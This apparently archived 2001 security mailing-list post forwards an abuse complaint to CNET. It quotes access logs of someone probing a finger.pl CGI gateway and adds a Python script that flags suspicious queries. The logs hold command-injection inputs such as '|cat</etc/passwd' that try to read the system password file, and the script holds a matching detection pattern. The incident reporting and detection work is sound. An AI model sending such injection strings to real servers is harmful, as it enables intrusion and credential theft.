I sent the following email to several CNET contacts last week regarding attempts to obtain one of my server's /etc/passwd file. I got no response from CNET, and I am curious to know if anyone else is being probed in this way.

--Len.

---------- Forwarded message ----------
Date: Thu, 3 May 2001 12:42:45 -0700 (PDT)
From: abuseat_private
To: hostmasterat_private, domain-adminat_private
Cc: sashapat_private

Dear CNET Admins,

It appears that a user on your network is attempting to exploit a vulnerability in HTTP-to-finger gateways. I discovered, in the below quoted logs, what looks to be an attempt to get our webserver to execute local commands and print the output to the web page. (Your user searched google.com for the finger.pl script, then attempted to view our passwd file and directory listings, ostensibly so that he could crack legitimate users' passwords and gain shell access to the system.)

While this individual was not successful in his attempt on our system, he may be doing this to other systems as well. Please let me know what action you are taking to prevent this from occurring in the future. Also, please preserve all logs, IP assignments, and other data you have pertaining to this incident while it is being investigated.

I would appreciate a response today, if possible.

Thank you,

Len Sassaman

86-241.cnet.com - - [02/May/2001:17:15:11 -0700] "GET /cgi-bin/finger.pl?rabbi HTTP/1.1" 200 37040 "http://www.google.com/search?as_q=&num=10&btnG=Google+Search&as_epq=finger.pl&as_oq=&as_eq=&as_occt=url&lr=&as_dt=i&as_sitesearch=&safe=off" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
86-241.cnet.com - - [02/May/2001:17:15:23 -0700] "GET /cgi-bin/finger.pl? HTTP/1.1" 200 357 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
86-241.cnet.com - - [02/May/2001:17:15:40 -0700] "GET /cgi-bin/finger.pl?|cat</etc/passwd HTTP/1.1" 200 189 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
86-241.cnet.com - - [02/May/2001:17:15:47 -0700] "GET /cgi-bin/finger.pl?;cat</etc/passwd HTTP/1.1" 200 189 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
86-241.cnet.com - - [02/May/2001:17:15:56 -0700] "GET /cgi-bin/finger.pl?|ls HTTP/1.1" 200 176 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
86-241.cnet.com - - [02/May/2001:17:16:10 -0700] "GET /cgi-bin/finger.pl?user@host HTTP/1.1" 200 140 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
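
For anyone who wants to check their own access logs for the same pattern, the following is an added example and not part of the original message: it parses Apache combined-format lines and reports CGI requests whose query string contains shell metacharacters after URL decoding. The function name, the regular expressions, the `/cgi-bin/` prefix default and the `client.example.net` line are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Apache combined log format: host ident user [time] "request" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>.*?) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
# Characters a shell treats specially; none belong in a finger user or user@host.
SHELL_META = re.compile(r'[|;&`$<>\n\r]')

def suspicious_requests(lines, cgi_prefix="/cgi-bin/"):
    """Return (host, time, decoded_query, status) for each CGI request whose
    query string contains shell metacharacters after URL decoding."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable request line
        path, _, query = m["target"].partition("?")
        if not path.startswith(cgi_prefix):
            continue
        decoded = unquote(query)  # catches %7C, %3B and similar encodings
        if SHELL_META.search(decoded):
            # A 200 status only means the script answered, not that a command ran.
            hits.append((m["host"], m["time"], decoded, int(m["status"])))
    return hits

AGENT = '"-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"'
SAMPLE = [
    # Four lines from the message above.
    '86-241.cnet.com - - [02/May/2001:17:15:40 -0700] "GET /cgi-bin/finger.pl?|cat</etc/passwd HTTP/1.1" 200 189 ' + AGENT,
    '86-241.cnet.com - - [02/May/2001:17:15:47 -0700] "GET /cgi-bin/finger.pl?;cat</etc/passwd HTTP/1.1" 200 189 ' + AGENT,
    '86-241.cnet.com - - [02/May/2001:17:15:56 -0700] "GET /cgi-bin/finger.pl?|ls HTTP/1.1" 200 176 ' + AGENT,
    '86-241.cnet.com - - [02/May/2001:17:16:10 -0700] "GET /cgi-bin/finger.pl?user@host HTTP/1.1" 200 140 ' + AGENT,
    # Constructed line: the same kind of query, URL-encoded, from a placeholder host.
    'client.example.net - - [02/May/2001:17:20:00 -0700] "GET /cgi-bin/finger.pl?%7Ccat%3C/etc/passwd HTTP/1.1" 200 189 ' + AGENT,
]

if __name__ == "__main__":
    for host, when, query, status in suspicious_requests(SAMPLE):
        print(f"{when} {host} status={status} query={query!r}")
```

Only the query string is inspected, so the `;` inside the user-agent field does not cause false hits on ordinary requests such as `user@host`.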